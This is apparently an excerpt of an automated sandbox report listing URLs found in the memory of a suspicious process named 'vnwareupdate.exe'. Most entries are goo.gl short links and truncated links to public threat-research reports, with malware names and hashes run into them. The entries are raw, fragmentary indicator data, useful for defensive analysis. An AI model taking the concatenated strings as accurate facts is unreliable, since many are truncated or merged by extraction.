Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/MSJCxP
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/MZ7dRg
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/Mr6M2J
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/N5MEj0
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/Nbqbt6
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/OOB3mH
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/OkB63qFidelis
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/PChE1z
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/Pg3P4W
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/QMRZ8K
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/QaOh4V
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/Qew6dT
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/RLf9qU
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/RvDwwA
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/SjQhlp
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/VbvJtL
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/VdrwgR
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/WVflzO
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/Z292v6
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/Z3JUAA
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/eFoP4A
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/ffeCfd
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/h6iaGj
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/hDQizk(w
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/hDQizk036EB11A5751C77BC65006769921C8E5;Bots
Source: vnwareupdate.exe, 00000003.00000003.237440903.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/hDQizk1CCC528390573062FF2311FCFD555064;Data-Stealing
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/hDQizk3A25847848C62C4F2DCA67D073A524AE;Destover
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/hDQizk8
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/hDQizk80
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxY
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxY23d.exe
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxY89d.exe
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYAbg.exe
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYConEmu.exe
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYFile.dll
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYNoodles.exe
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYOrange
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYPort.dll
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYSession.dll
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYShell.dll
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYSocks.dll
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYY
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYf3e3e25a822012023c6e81b206711865Energetic
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/i3prxYrk
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/iqH8CK
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/jKIfGB
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/jhJWRpUpdateproxy.dll
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/joxXHF
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/jp2SkT
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/p32Ozf
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/pTffPA
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/puVc9q
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/qScSrE
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/qeBHsr
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/rW1yvZ
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/snc85M
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/t3uUTG
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/t3uUTGMofang
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237440903.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/t3uUTGTROJ_WERDLOD:
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/tcSoiJ
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/tezXZt
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/th5q2vGMicrosoft
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/uAic1X
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/urp4CD
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/v3ebal
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/vtQoCQ
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/vtQoCQProject
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/wt1xlh
Source: vnwareupdate.exe, 00000003.00000003.237440903.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/wt1xlhD1C27EE7CE18675974EDF42D4EEA25C6;Destover
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/wt1xlhProject
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/wt1xlhROKRAT
Source: vnwareupdate.exe, 00000003.00000003.237440903.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/wt1xlhTROJ_WERDLOD:
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/x81cSy
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/xnKTgt
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/xnKTgt.p9
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/xnKTgtrk
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/zPsn83
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/zRf5V8
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/zRf5V83da8e94c6d1efe2a039f49a1e748df5eef01af5aV8The
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/zRf5V84bdd366d8ee35503cf062ae22abe5a4a2d8d8907V8The
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/zRf5V85c52996d9f68ba6fd0da4982f238ec1d279a7f9d8839d3e213717b88a06ffc48827929891a10059
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/zRf5V8The
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://hazmalware.blogspot.co.uk/2016/12/analysis-of-august-stealer-malware.htm
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://heimdalsecurity.com/blog/security-alert-adwind-rat-targeted-attacks-zero
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://ics-cert.kaspersky.com/2016/12/16/spear-phishing-attack-hits-industrial-
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://ics-cert.kaspersky.com/2016/12/16/spear-phishing-attack-hits-industrial-8
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://ics-cert.kaspersky.com/2016/12/16/spear-phishing-attack-hits-industrial-Iranian
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://ics-cert.kaspersky.com/2016/12/16/spear-phishing-attack-hits-industrial-Spear
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118
Source: vnwareupdate.exe, 00000003.00000003.233075798.00000000060F3000.00000004.00000001.sdmp	String found in binary or memory: https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118Dark
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118New
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://iranthreats.github.io/resources/human-rights-impersonation-malware/
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://iranthreats.github.io/resources/human-rights-impersonation-malware/MALWARE
Source: vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://iranthreats.github.io/resources/macdownloader-macos-malware/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://isc.sans.edu/diary/Analysis
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://isc.sans.edu/diary/Tomcat
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://isc.sans.edu/forums/diary/Adwind
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://isc.sans.edu/forums/diary/Malspam
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://isc.sans.edu/forums/diary/NemucodAES
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://isc.sans.edu/forums/diary/Sage
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://issp.ua/issp_system_images/Crystal_Finance_Millennium_CyberAttack_EN.pdf
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://issp.ua/issp_system_images/Crystal_Finance_Millennium_CyberAttack_EN.pdfSednit
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://issp.ua/issp_system_images/Crystal_Finance_Millennium_CyberAttack_EN.pdfUkranian
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://kasperskycontenthub.com/securelist/?p=75237
Source: vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/themysteryoft
Source: vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/theteamspysto
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-t
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-tA
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-tPlatinum
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-tWinnti
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/2016/05/inside-the-million-machine-clickfraud-botne
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/2013/04/MiniDuke_Paper
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insid
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insid0Operation
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insid1Operation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insid2Operation
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insid3Operation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insid4Operation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidIOperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidOperation
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidROperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidTOperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidVOperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidXOperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidb3Operation
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insiddOperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insideOperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidfOperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidlOperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidlienVault
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidoOperation
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidrOperation
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidsOperation
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidtOperation
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-insidzOperation
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summi
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summiDridex
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summiWonknu:
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applican
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp	String found in binary or memory: https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applican.
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applican.P
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicanMONSOON
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicanQarallax
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://login.yahoo.com/config/login
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://logrhythm.com/pdfs/threat-research/logrhythm-labs-oilrig-campaign-analys
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://malwr.com/analysis/ZDc4ZmIyZDI4MTVjNGY5NWI0YzE3YjIzNGFjZTcyYTY/
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: https://map.blueliv.com
Source: vnwareupdate.exe, 00000003.00000003.234268201.0000000006033000.00000004.00000001.sdmp	String found in binary or memory: https://maps.blueliv.com
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://matt.ucc.asn.au/dropbear/dropbear.html
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://medium.com/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://minergate.com/faq/what-pool-address
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://mlwre.github.io/2015/12/11/Derkziel-Sofware.html
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://mlwre.github.io/2015/12/11/Derkziel-Sofware.html25e4d8354c882eaea94b52039a96cc6d969a2dec8486
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://mlwre.github.io/2015/12/11/Derkziel-Sofware.htmlDerkziel
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: https://mymalwareparty.blogspot.co.uk/2017/07/operation-desert-eagle.html
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://mymalwareparty.blogspot.co.uk/2017/07/operation-desert-eagle.html/Disrupting
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://mymalwareparty.blogspot.co.uk/2017/07/operation-desert-eagle.html/Operation
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://mymalwareparty.blogspot.co.uk/2017/07/operation-desert-eagle.htmlAlmanah
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://mymalwareparty.blogspot.co.uk/2017/07/operation-desert-eagle.htmlOperation
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://mymalwareparty.blogspot.co.uk/2017/07/operation-desert-eagle.htmlRoki
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://mymalwareparty.blogspot.co.uk/2017/07/operation-desert-eagle.htmls/Operation
